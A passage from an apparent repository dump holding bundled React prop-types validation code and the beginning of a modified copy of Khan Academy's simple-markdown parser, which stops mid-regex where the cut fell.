}\n}\n\nmodule.exports = checkPropTypes;\n\n},{\"30\":30,\"31\":31,\"36\":36}],34:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\n// React 15.5 references this module, and assumes PropTypes are still callable in production.\n// Therefore we re-export development-only version with all the PropTypes checks here.\n// However if one is migrating to the `prop-types` npm library, they will go through the\n// `index.js` entry point, and it will branch depending on the environment.\nvar factory = _dereq_(35);\nmodule.exports = function(isValidElement) {\n  // It is still allowed in 15.5.\n  var throwOnDirectAccess = false;\n  return factory(isValidElement, throwOnDirectAccess);\n};\n\n},{\"35\":35}],35:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nvar emptyFunction = _dereq_(28);\nvar invariant = _dereq_(30);\nvar warning = _dereq_(31);\n\nvar ReactPropTypesSecret = _dereq_(36);\nvar checkPropTypes = _dereq_(33);\n\nmodule.exports = function(isValidElement, throwOnDirectAccess) {\n  /* global Symbol */\n  var ITERATOR_SYMBOL = typeof Symbol === 'function' && Symbol.iterator;\n  var FAUX_ITERATOR_SYMBOL = '@@iterator'; // Before Symbol spec.\n\n  /**\n   * Returns the iterator method function contained on the iterable object.\n   *\n   * Be sure to invoke the function with the iterable as context:\n   *\n   *     var iteratorFn = getIteratorFn(myIterable);\n   *     if (iteratorFn) {\n   *       var iterator = iteratorFn.call(myIterable);\n   *       ...\n   *     }\n   *\n   * @param {?object} maybeIterable\n   * @return {?function}\n   */\n  function getIteratorFn(maybeIterable) {\n    var iteratorFn = maybeIterable && (ITERATOR_SYMBOL && maybeIterable[ITERATOR_SYMBOL] || maybeIterable[FAUX_ITERATOR_SYMBOL]);\n    if (typeof iteratorFn === 'function') {\n      return iteratorFn;\n    }\n  }\n\n  /**\n   * Collection of methods that allow declaration and validation of props that are\n   * supplied to React components. Example usage:\n   *\n   *   var Props = require('ReactPropTypes');\n   *   var MyArticle = React.createClass({\n   *     propTypes: {\n   *       // An optional string prop named \"description\".\n   *       description: Props.string,\n   *\n   *       // A required enum prop named \"category\".\n   *       category: Props.oneOf(['News','Photos']).isRequired,\n   *\n   *       // A prop named \"dialog\" that requires an instance of Dialog.\n   *       dialog: Props.instanceOf(Dialog).isRequired\n   *     },\n   *     render: function() { ... }\n   *   });\n   *\n   * A more formal specification of how these methods are used:\n   *\n   *   type := array|bool|func|object|number|string|oneOf([...])|instanceOf(...)\n   *   decl := ReactPropTypes.{type}(.isRequired)?\n   *\n   * Each and every declaration produces a function with the same signature. This\n   * allows the creation of custom validation functions. For example:\n   *\n   *  var MyLink = React.createClass({\n   *    propTypes: {\n   *      // An optional string or URI prop named \"href\".\n   *      href: function(props, propName, componentName) {\n   *        var propValue = props[propName];\n   *        if (propValue != null && typeof propValue !== 'string' &&\n   *            !(propValue instanceof URI)) {\n   *          return new Error(\n   *            'Expected a string or an URI for ' + propName + ' in ' +\n   *            componentName\n   *          );\n   *        }\n   *      }\n   *    },\n   *    render: function() {...}\n   *  });\n   *\n   * @internal\n   */\n\n  var ANONYMOUS = '<<anonymous>>';\n\n  // Important!\n  // Keep this list in sync with production version in `./factoryWithThrowingShims.js`.\n  var ReactPropTypes = {\n    array: createPrimitiveTypeChecker('array'),\n    bool: createPrimitiveTypeChecker('boolean'),\n    func: createPrimitiveTypeChecker('function'),\n    number: createPrimitiveTypeChecker('number'),\n    object: createPrimitiveTypeChecker('object'),\n    string: createPrimitiveTypeChecker('string'),\n    symbol: createPrimitiveTypeChecker('symbol'),\n\n    any: createAnyTypeChecker(),\n    arrayOf: createArrayOfTypeChecker,\n    element: createElementTypeChecker(),\n    instanceOf: createInstanceTypeChecker,\n    node: createNodeChecker(),\n    objectOf: createObjectOfTypeChecker,\n    oneOf: createEnumTypeChecker,\n    oneOfType: createUnionTypeChecker,\n    shape: createShapeTypeChecker\n  };\n\n  /**\n   * inlined Object.is polyfill to avoid requiring consumers ship their own\n   * https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/is\n   */\n  /*eslint-disable no-self-compare*/\n  function is(x, y) {\n    // SameValue algorithm\n    if (x === y) {\n      // Steps 1-5, 7-10\n      // Steps 6.b-6.e: +0 != -0\n      return x !== 0 || 1 / x === 1 / y;\n    } else {\n      // Step 6.a: NaN == NaN\n      return x !== x && y !== y;\n    }\n  }\n  /*eslint-enable no-self-compare*/\n\n  /**\n   * We use an Error-like object for backward compatibility as people may call\n   * PropTypes directly and inspect their output. However, we don't use real\n   * Errors anymore. We don't inspect their stack anyway, and creating them\n   * is prohibitively expensive if they are created too often, such as what\n   * happens in oneOfType() for any type before the one that matched.\n   */\n  function PropTypeError(message) {\n    this.message = message;\n    this.stack = '';\n  }\n  // Make `instanceof Error` still work for returned errors.\n  PropTypeError.prototype = Error.prototype;\n\n  function createChainableTypeChecker(validate) {\n    if (\"development\" !== 'production') {\n      var manualPropTypeCallCache = {};\n      var manualPropTypeWarningCount = 0;\n    }\n    function checkType(isRequired, props, propName, componentName, location, propFullName, secret) {\n      componentName = componentName || ANONYMOUS;\n      propFullName = propFullName || propName;\n\n      if (secret !== ReactPropTypesSecret) {\n        if (throwOnDirectAccess) {\n          // New behavior only for users of `prop-types` package\n          invariant(\n            false,\n            'Calling PropTypes validators directly is not supported by the `prop-types` package. ' +\n            'Use `PropTypes.checkPropTypes()` to call them. ' +\n            'Read more at http://fb.me/use-check-prop-types'\n          );\n        } else if (\"development\" !== 'production' && typeof console !== 'undefined') {\n          // Old behavior for people using React.PropTypes\n          var cacheKey = componentName + ':' + propName;\n          if (\n            !manualPropTypeCallCache[cacheKey] &&\n            // Avoid spamming the console because they are often not actionable except for lib authors\n            manualPropTypeWarningCount < 3\n          ) {\n            warning(\n              false,\n              'You are manually calling a React.PropTypes validation ' +\n              'function for the `%s` prop on `%s`. This is deprecated ' +\n              'and will throw in the standalone `prop-types` package. ' +\n              'You may be seeing this warning due to a third-party PropTypes ' +\n              'library. See https://fb.me/react-warning-dont-call-proptypes ' + 'for details.',\n              propFullName,\n              componentName\n            );\n            manualPropTypeCallCache[cacheKey] = true;\n            manualPropTypeWarningCount++;\n          }\n        }\n      }\n      if (props[propName] == null) {\n        if (isRequired) {\n          if (props[propName] === null) {\n            return new PropTypeError('The ' + location + ' `' + propFullName + '` is marked as required ' + ('in `' + componentName + '`, but its value is `null`.'));\n          }\n          return new PropTypeError('The ' + location + ' `' + propFullName + '` is marked as required in ' + ('`' + componentName + '`, but its value is `undefined`.'));\n        }\n        return null;\n      } else {\n        return validate(props, propName, componentName, location, propFullName);\n      }\n    }\n\n    var chainedCheckType = checkType.bind(null, false);\n    chainedCheckType.isRequired = checkType.bind(null, true);\n\n    return chainedCheckType;\n  }\n\n  function createPrimitiveTypeChecker(expectedType) {\n    function validate(props, propName, componentName, location, propFullName, secret) {\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== expectedType) {\n        // `propValue` being instance of, say, date/regexp, pass the 'object'\n        // check, but we can offer a more precise error message here rather than\n        // 'of type `object`'.\n        var preciseType = getPreciseType(propValue);\n\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + preciseType + '` supplied to `' + componentName + '`, expected ') + ('`' + expectedType + '`.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createAnyTypeChecker() {\n    return createChainableTypeChecker(emptyFunction.thatReturnsNull);\n  }\n\n  function createArrayOfTypeChecker(typeChecker) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (typeof typeChecker !== 'function') {\n        return new PropTypeError('Property `' + propFullName + '` of component `' + componentName + '` has invalid PropType notation inside arrayOf.');\n      }\n      var propValue = props[propName];\n      if (!Array.isArray(propValue)) {\n        var propType = getPropType(propValue);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected an array.'));\n      }\n      for (var i = 0; i < propValue.length; i++) {\n        var error = typeChecker(propValue, i, componentName, location, propFullName + '[' + i + ']', ReactPropTypesSecret);\n        if (error instanceof Error) {\n          return error;\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createElementTypeChecker() {\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      if (!isValidElement(propValue)) {\n        var propType = getPropType(propValue);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected a single ReactElement.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createInstanceTypeChecker(expectedClass) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (!(props[propName] instanceof expectedClass)) {\n        var expectedClassName = expectedClass.name || ANONYMOUS;\n        var actualClassName = getClassName(props[propName]);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + actualClassName + '` supplied to `' + componentName + '`, expected ') + ('instance of `' + expectedClassName + '`.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createEnumTypeChecker(expectedValues) {\n    if (!Array.isArray(expectedValues)) {\n      \"development\" !== 'production' ? warning(false, 'Invalid argument supplied to oneOf, expected an instance of array.') : void 0;\n      return emptyFunction.thatReturnsNull;\n    }\n\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      for (var i = 0; i < expectedValues.length; i++) {\n        if (is(propValue, expectedValues[i])) {\n          return null;\n        }\n      }\n\n      var valuesString = JSON.stringify(expectedValues);\n      return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of value `' + propValue + '` ' + ('supplied to `' + componentName + '`, expected one of ' + valuesString + '.'));\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createObjectOfTypeChecker(typeChecker) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (typeof typeChecker !== 'function') {\n        return new PropTypeError('Property `' + propFullName + '` of component `' + componentName + '` has invalid PropType notation inside objectOf.');\n      }\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== 'object') {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected an object.'));\n      }\n      for (var key in propValue) {\n        if (propValue.hasOwnProperty(key)) {\n          var error = typeChecker(propValue, key, componentName, location, propFullName + '.' + key, ReactPropTypesSecret);\n          if (error instanceof Error) {\n            return error;\n          }\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createUnionTypeChecker(arrayOfTypeCheckers) {\n    if (!Array.isArray(arrayOfTypeCheckers)) {\n      \"development\" !== 'production' ? warning(false, 'Invalid argument supplied to oneOfType, expected an instance of array.') : void 0;\n      return emptyFunction.thatReturnsNull;\n    }\n\n    for (var i = 0; i < arrayOfTypeCheckers.length; i++) {\n      var checker = arrayOfTypeCheckers[i];\n      if (typeof checker !== 'function') {\n        warning(\n          false,\n          'Invalid argument supplid to oneOfType. Expected an array of check functions, but ' +\n          'received %s at index %s.',\n          getPostfixForTypeWarning(checker),\n          i\n        );\n        return emptyFunction.thatReturnsNull;\n      }\n    }\n\n    function validate(props, propName, componentName, location, propFullName) {\n      for (var i = 0; i < arrayOfTypeCheckers.length; i++) {\n        var checker = arrayOfTypeCheckers[i];\n        if (checker(props, propName, componentName, location, propFullName, ReactPropTypesSecret) == null) {\n          return null;\n        }\n      }\n\n      return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` supplied to ' + ('`' + componentName + '`.'));\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createNodeChecker() {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (!isNode(props[propName])) {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` supplied to ' + ('`' + componentName + '`, expected a ReactNode.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createShapeTypeChecker(shapeTypes) {\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== 'object') {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type `' + propType + '` ' + ('supplied to `' + componentName + '`, expected `object`.'));\n      }\n      for (var key in shapeTypes) {\n        var checker = shapeTypes[key];\n        if (!checker) {\n          continue;\n        }\n        var error = checker(propValue, key, componentName, location, propFullName + '.' + key, ReactPropTypesSecret);\n        if (error) {\n          return error;\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function isNode(propValue) {\n    switch (typeof propValue) {\n      case 'number':\n      case 'string':\n      case 'undefined':\n        return true;\n      case 'boolean':\n        return !propValue;\n      case 'object':\n        if (Array.isArray(propValue)) {\n          return propValue.every(isNode);\n        }\n        if (propValue === null || isValidElement(propValue)) {\n          return true;\n        }\n\n        var iteratorFn = getIteratorFn(propValue);\n        if (iteratorFn) {\n          var iterator = iteratorFn.call(propValue);\n          var step;\n          if (iteratorFn !== propValue.entries) {\n            while (!(step = iterator.next()).done) {\n              if (!isNode(step.value)) {\n                return false;\n              }\n            }\n          } else {\n            // Iterator will provide entry [k,v] tuples rather than values.\n            while (!(step = iterator.next()).done) {\n              var entry = step.value;\n              if (entry) {\n                if (!isNode(entry[1])) {\n                  return false;\n                }\n              }\n            }\n          }\n        } else {\n          return false;\n        }\n\n        return true;\n      default:\n        return false;\n    }\n  }\n\n  function isSymbol(propType, propValue) {\n    // Native Symbol.\n    if (propType === 'symbol') {\n      return true;\n    }\n\n    // 19.4.3.5 Symbol.prototype[@@toStringTag] === 'Symbol'\n    if (propValue['@@toStringTag'] === 'Symbol') {\n      return true;\n    }\n\n    // Fallback for non-spec compliant Symbols which are polyfilled.\n    if (typeof Symbol === 'function' && propValue instanceof Symbol) {\n      return true;\n    }\n\n    return false;\n  }\n\n  // Equivalent of `typeof` but with special handling for array and regexp.\n  function getPropType(propValue) {\n    var propType = typeof propValue;\n    if (Array.isArray(propValue)) {\n      return 'array';\n    }\n    if (propValue instanceof RegExp) {\n      // Old webkits (at least until Android 4.0) return 'function' rather than\n      // 'object' for typeof a RegExp. We'll normalize this here so that /bla/\n      // passes PropTypes.object.\n      return 'object';\n    }\n    if (isSymbol(propType, propValue)) {\n      return 'symbol';\n    }\n    return propType;\n  }\n\n  // This handles more types than `getPropType`. Only used for error messages.\n  // See `createPrimitiveTypeChecker`.\n  function getPreciseType(propValue) {\n    if (typeof propValue === 'undefined' || propValue === null) {\n      return '' + propValue;\n    }\n    var propType = getPropType(propValue);\n    if (propType === 'object') {\n      if (propValue instanceof Date) {\n        return 'date';\n      } else if (propValue instanceof RegExp) {\n        return 'regexp';\n      }\n    }\n    return propType;\n  }\n\n  // Returns a string that is postfixed to a warning about an invalid type.\n  // For example, \"undefined\" or \"of type array\"\n  function getPostfixForTypeWarning(value) {\n    var type = getPreciseType(value);\n    switch (type) {\n      case 'array':\n      case 'object':\n        return 'an ' + type;\n      case 'boolean':\n      case 'date':\n      case 'regexp':\n        return 'a ' + type;\n      default:\n        return type;\n    }\n  }\n\n  // Returns class name of the object, if any.\n  function getClassName(propValue) {\n    if (!propValue.constructor || !propValue.constructor.name) {\n      return ANONYMOUS;\n    }\n    return propValue.constructor.name;\n  }\n\n  ReactPropTypes.checkPropTypes = checkPropTypes;\n  ReactPropTypes.PropTypes = ReactPropTypes;\n\n  return ReactPropTypes;\n};\n\n},{\"28\":28,\"30\":30,\"31\":31,\"33\":33,\"36\":36}],36:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nvar ReactPropTypesSecret = 'SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED';\n\nmodule.exports = ReactPropTypesSecret;\n\n},{}]},{},[16])(16)\n});"
  },
  {
    "path": "simple-markdown-playground/simple-markdown-modified.js",
    "content": "/* @flow */\n\n/**\n * Simple-Markdown\n * ===============\n *\n * Simple-Markdown's primary goal is to be easy to adapt. It aims\n * to be compliant with John Gruber's [Markdown Syntax page][1],\n * but compatiblity with other markdown implementations' edge-cases\n * will be sacrificed where it conflicts with simplicity or\n * extensibility.\n *\n * If your goal is to simply embed a standard markdown implementation\n * in your website, simple-markdown is probably not the best library\n * for you (although it should work). But if you have struggled to\n * customize an existing library to meet your needs, simple-markdown\n * might be able to help.\n *\n * Many of the regexes and original logic has been adapted from\n * the wonderful [marked.js](https://github.com/chjj/marked)\n *\n * LICENSE (MIT):\n * New code copyright (c) 2014 Khan Academy.\n *\n * Portions adapted from marked.js copyright (c) 2011-2014\n * Christopher Jeffrey (https://github.com/chjj/).\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n(function () {\n\n    var CR_NEWLINE_R = /\\r\\n?/g;\n    var TAB_R = /\\t/g;\n    var FORMFEED_R = /\\f/g\n    // Turn various crazy whitespace into easy to process things\n    var preprocess = function (source) {\n        return source.replace(CR_NEWLINE_R, '\\n')\n            .replace(FORMFEED_R, '')\n            .replace(TAB_R, '    ');\n    };\n\n    /**\n     * Creates a parser for a given set of rules, with the precedence\n     * specified as a list of rules.\n     *\n     * @rules: an object containing\n     * rule type -> {match, order, parse} objects\n     * (lower order is higher precedence)\n     * (Note: `order` is added to defaultRules after creation so that\n     *  the `order` of defaultRules in the source matches the `order`\n     *  of defaultRules in terms of `order` fields.)\n     *\n     * @returns The resulting parse function, with the following parameters:\n     *   @source: the input source string to be parsed\n     *   @state: an optional object to be threaded through parse\n     *     calls. Allows clients to add stateful operations to\n     *     parsing, such as keeping track of how many levels deep\n     *     some nesting is. For an example use-case, see passage-ref\n     *     parsing in src/widgets/passage/passage-markdown.jsx\n     */\n    var parserFor = function (rules) {\n        // Sorts rules in order of increasing order, then\n        // ascending rule name in case of ties.\n        var ruleList = Object.keys(rules);\n        ruleList.forEach(function (type) {\n            var order = rules[type].order;\n            if ((typeof order !== 'number' || !isFinite(order)) &&\n                typeof console !== 'undefined') {\n                console.warn(\n                    \"simple-markdown: Invalid order for rule `\" + type + \"`: \" +\n                    order\n                );\n            }\n        });\n\n        ruleList.sort(function (typeA, typeB) {\n            var ruleA = rules[typeA];\n            var ruleB = rules[typeB];\n            var orderA = ruleA.order;\n            var orderB = ruleB.order;\n\n            // First sort based on increasing order\n            if (orderA !== orderB) {\n                return orderA - orderB;\n\n            }\n\n            var secondaryOrderA = ruleA.quality ? 0 : 1;\n            var secondaryOrderB = ruleB.quality ? 0 : 1;\n\n            if (secondaryOrderA !== secondaryOrderB) {\n                return secondaryOrderA - secondaryOrderB;\n\n                // Then based on increasing unicode lexicographic ordering\n            } else if (typeA < typeB) {\n                return -1;\n            } else if (typeA > typeB) {\n                return 1;\n\n            } else {\n                // Rules should never have the same name,\n                // but this is provided for completeness.\n                return 0;\n            }\n        });\n\n        var nestedParse = function (source, state) {\n            var result = [];\n            state = state || {};\n            // We store the previous capture so that match functions can\n            // use some limited amount of lookbehind. Lists use this to\n            // ensure they don't match arbitrary '- ' or '* ' in inline\n            // text (see the list rule for more information).\n            var prevCapture = \"\";\n            while (source) {\n                // store the best match, it's rule, and quality:\n                var ruleType = null;\n                var rule = null;\n                var capture = null;\n                var quality = NaN;\n\n                // loop control variables:\n                var i = 0;\n                var currRuleType = ruleList[0];\n                var currRule = rules[currRuleType];\n\n                do {\n                    var currOrder = currRule.order;\n                    var currCapture = currRule.match(source, state, prevCapture);\n\n                    if (currCapture) {\n                        var currQuality = currRule.quality ? currRule.quality(\n                            currCapture,\n                            state,\n                            prevCapture\n                        ) : 0;\n                        // This should always be true the first time because\n                        // the initial quality is NaN (that's why there's the\n                        // condition negation).\n                        if (!(currQuality <= quality)) {\n                            ruleType = currRuleType;\n                            rule = currRule;\n                            capture = currCapture;\n                            quality = currQuality;\n                        }\n                    }\n\n                    // Move on to the next item.\n                    // Note that this makes `currRule` be the next item\n                    i++;\n                    currRuleType = ruleList[i];\n                    currRule = rules[currRuleType];\n\n                } while (\n                    // keep looping while we're still within the ruleList\n                    currRule && (\n                        // if we don't have a match yet, continue\n                        !capture || (\n                            // or if we have a match, but the next rule is\n                            // at the same order, and has a quality measurement\n                            // functions, then this rule must have a quality\n                            // measurement function (since they are sorted before\n                            // those without), and we need to check if there is\n                            // a better quality match\n                            currRule.order === currOrder &&\n                            currRule.quality\n                        )\n                    )\n                );\n\n                // TODO(aria): Write tests for this\n                if (!capture) {\n                    throw new Error(\n                        \"could not find rule to match content: \" + source\n                    );\n                }\n\n                var parsed = rule.parse(capture, nestedParse, state);\n                // We maintain the same object here so that rules can\n                // store references to the objects they return and\n                // modify them later. (oops sorry! but this adds a lot\n                // of power--see reflinks.)\n                if (Array.isArray(parsed)) {\n                    Array.prototype.push.apply(result, parsed);\n                }\n                else {\n                    // We also let rules override the default type of\n                    // their parsed node if they would like to, so that\n                    // there can be a single output function for all links,\n                    // even if there are several rules to parse them.\n                    if (parsed.type == null) {\n                        parsed.type = ruleType;\n                    }\n                    result.push(parsed);\n                }\n\n                prevCapture = capture[0];\n                source = source.substring(prevCapture.length);\n            }\n            return result;\n        };\n\n        var outerParse = function (source, state) {\n            return nestedParse(preprocess(source), state);\n        };\n        return outerParse;\n    };\n\n    // Creates a match function for an inline scoped element from a regex\n    var inlineRegex = function (regex) {\n        var match = function (source, state) {\n            if (state.inline) {\n                return regex.exec(source);\n            } else {\n                return null;\n            }\n        };\n        match.regex = regex;\n        return match;\n    };\n\n    // Creates a match function for a block scoped element from a regex\n    var blockRegex = function (regex) {\n        var match = function (source, state) {\n            if (state.inline) {\n                return null;\n            } else {\n                return regex.exec(source);\n            }\n        };\n        match.regex = regex;\n        return match;\n    };\n\n    // Creates a match function from a regex, ignoring block/inline scope\n    var anyScopeRegex = function (regex) {\n        var match = function (source, state) {\n            return regex.exec(source);\n        };\n        match.regex = regex;\n        return match;\n    };\n\n    var reactFor = function (outputFunc) {\n        var nestedOutput = function (ast, state) {\n            state = state || {};\n            if (Array.isArray(ast)) {\n                var oldKey = state.key;\n                var result = [];\n\n                // map nestedOutput over the ast, except group any text\n                // nodes together into a single string output.\n                var lastWasString = false;\n                for (var i = 0; i < ast.length; i++) {\n                    state.key = i;\n                    var nodeOut = nestedOutput(ast[i], state);\n                    var isString = (typeof nodeOut === \"string\");\n                    if (isString && lastWasString) {\n                        result[result.length - 1] += nodeOut;\n                    } else {\n                        result.push(nodeOut);\n                    }\n                    lastWasString = isString;\n                }\n\n                state.key = oldKey;\n                return result;\n            } else {\n                return outputFunc(ast, nestedOutput, state);\n            }\n        };\n        return nestedOutput;\n    };\n\n    var htmlFor = function (outputFunc) {\n        var nestedOutput = function (ast, state) {\n            state = state || {};\n            if (Array.isArray(ast)) {\n                return ast.map(function (node) {\n                    return nestedOutput(node, state);\n                }).join(\"\");\n            } else {\n                return outputFunc(ast, nestedOutput, state);\n            }\n        };\n        return nestedOutput;\n    };\n\n    var TYPE_SYMBOL =\n        (typeof Symbol === 'function' && Symbol.for &&\n            Symbol.for('react.element')) ||\n        0xeac7;\n\n    var reactElement = function (element) {\n        // Debugging assertions. To be commented out when committed\n        // TODO(aria): Figure out a better way of having dev asserts\n        /*\n            if (typeof element.props !== \"object\") {\n                throw new Error(\"props of \" + element.type + \" must be an object\");\n            }\n            if (!element.$$typeof) {\n                throw new Error(\n                    \"must set $$typeof on element \" +\n                    element.type\n                );\n            }\n            if (element._store !== null) { // === because we don't want to count\n                                           // undefined here\n                throw new Error(\n                    \"must set _store to null on element \" +\n                    element.type\n                );\n            }\n        */\n\n        // This should just override an already present element._store, which\n        // exists so that the class of this object doesn't change in V8\n        element._store = {\n            validated: true,\n            originalProps: element.props\n        };\n        return element;\n    };\n\n    // Returns a closed HTML tag.\n    // tagName: Name of HTML tag (eg. \"em\" or \"a\")\n    // content: Inner content of tag\n    // attributes: Optional extra attributes of tag as an object of key-value pairs\n    //   eg. { \"href\": \"http://google.com\" }. Falsey attributes are filtered out.\n    // isClosed: boolean that controls whether tag is closed or not (eg. img tags).\n    //   defaults to true\n    var htmlTag = function (tagName, content, attributes, isClosed) {\n        attributes = attributes || {};\n        isClosed = typeof isClosed !== 'undefined' ? isClosed : true;\n\n        var attributeString = \"\";\n        for (var attr in attributes) {\n            // Removes falsey attributes\n            if (Object.prototype.hasOwnProperty.call(attributes, attr) &&\n                attributes[attr]) {\n                attributeString += \" \" + attr + '=\"' + attributes[attr] + '\"';\n            }\n        }\n\n        var unclosedTag = \"<\" + tagName + attributeString + \">\";\n\n        if (isClosed) {\n            return unclosedTag + content + \"</\" + tagName + \">\";\n        } else {\n            return unclosedTag;\n        }\n    };\n\n    var EMPTY_PROPS = {};\n\n    var sanitizeUrl = function (url) {\n        if (url == null) {\n            return null;\n        }\n        try {\n            var prot = decodeURIComponent(url)\n                .replace(/[^A-Za-z0-9/:]/g, '')\n                .toLowerCase();\n            if (prot.indexOf('javascript:') === 0) {\n                return null;\n            }\n        } catch (e) {\n            // decodeURIComponent sometimes throws a URIError\n            // See `decodeURIComponent('a%AFc');`\n            // http://stackoverflow.com/questions/9064536/javascript-decodeuricomponent-malformed-uri-exception\n            return null;\n        }\n        return url;\n    };\n\n    var UNESCAPE_URL_R = /\\\\([^0-9A-Za-z\\s])/g;\n\n    var unescapeUrl = function (rawUrlString) {\n        return rawUrlString.replace(UNESCAPE_URL_R, \"$1\");\n    };\n\n    // Parse some content with the parser `parse`, with state.inline\n    // set to true. Useful for block elements; not generally necessary\n    // to be used by inline elements (where state.inline is already true.\n    var parseInline = function (parse, content, state) {\n        var isCurrentlyInline = state.inline || false;\n        state.inline = true;\n        var result = parse(content, state);\n        state.inline = isCurrentlyInline;\n        return result;\n    };\n    var parseBlock = function (parse, content, state) {\n        var isCurrentlyInline = state.inline || false;\n        state.inline = false;\n        var result = parse(content + \"\\n\\n\", state);\n        state.inline = isCurrentlyInline;\n        return result;\n    };\n\n    var parseCaptureInline = function (capture, parse, state) {\n        return {\n            content: parseInline(parse, capture[1], state)\n        };\n    };\n    var ignoreCapture = function () { return {}; };\n\n    // recognize a `*` `-`, `+`, `1.`, `2.`... list bullet\n    var LIST_BULLET = \"(?:[*+-]|\\\\d+\\\\.)\";\n    // recognize the start of a list item:\n    // leading space plus a bullet plus a space (`   * `)\n    var LIST_ITEM_PREFIX = \"( *)(\" + LIST_BULLET + \") +\";\n    var LIST_ITEM_PREFIX_R = new RegExp(\"^\" + LIST_ITEM_PREFIX);\n    // recognize an individual list item:\n    //  * hi\n    //    this is part of the same item\n    //\n    //    as is this, which is a new paragraph in the same item\n    //\n    //  * but this is not part of the same item\n    var LIST_ITEM_R = new RegExp(\n        LIST_ITEM_PREFIX +\n        \"[^\\\\n]*(?:\\\\n\" +\n        \"(?!\\\\1\" + LIST_BULLET + \" )[^\\\\n]*)*(\\n|$)\",\n        \"gm\"\n    );\n    var BLOCK_END_R = /\\n{2,}$/;\n    // recognize the end of a paragraph block inside a list item:\n    // two or more newlines at end end of the item\n    var LIST_BLOCK_END_R = BLOCK_END_R;\n    var LIST_ITEM_END_R = / *\\n+$/;\n    // check whether a list item has paragraphs: if it does,\n    // we leave the newlines at the end\n    var LIST_R = new RegExp(\n        \"^( *)(\" + LIST_BULLET + \") \" +\n        \"[\\\\s\\\\S]+?(?:\\n{2,}(?! )\" +\n        \"(?!\\\\1\" + LIST_BULLET + \" )\\\\n*\" +\n        // the \\\\s*$ here is so that we can parse the inside of nested\n        // lists, where our content might end before we receive two `\\n`s\n        \"|\\\\s*\\n*$)\"\n    );\n    var LIST_LOOKBEHIND_R = /^$|\\n *$/;\n\n    var TABLES = (function () {\n        // predefine regexes so we don't have to create them inside functions\n        // sure, regex literals should be fast, even inside functions, but they\n        // aren't in all browsers.\n        var TABLE_HEADER_TRIM = /^ *| *\\| *$/g;\n        var TABLE_ALIGN_TRIM = /^ *|\\| *$/g;\n\n        var TABLE_CELLS_TRIM = /(?: *\\| *)?\\n$/;\n        var NPTABLE_CELLS_TRIM = /\\n$/;\n        var PLAIN_TABLE_ROW_TRIM = /^ *\\| *| *\\| *$/g;\n        var TABLE_ROW_SPLIT = / *\\| */;\n\n        var TABLE_RIGHT_ALIGN = /^ *-+: *$/;\n        var TABLE_CENTER_ALIGN = /^ *:-+: 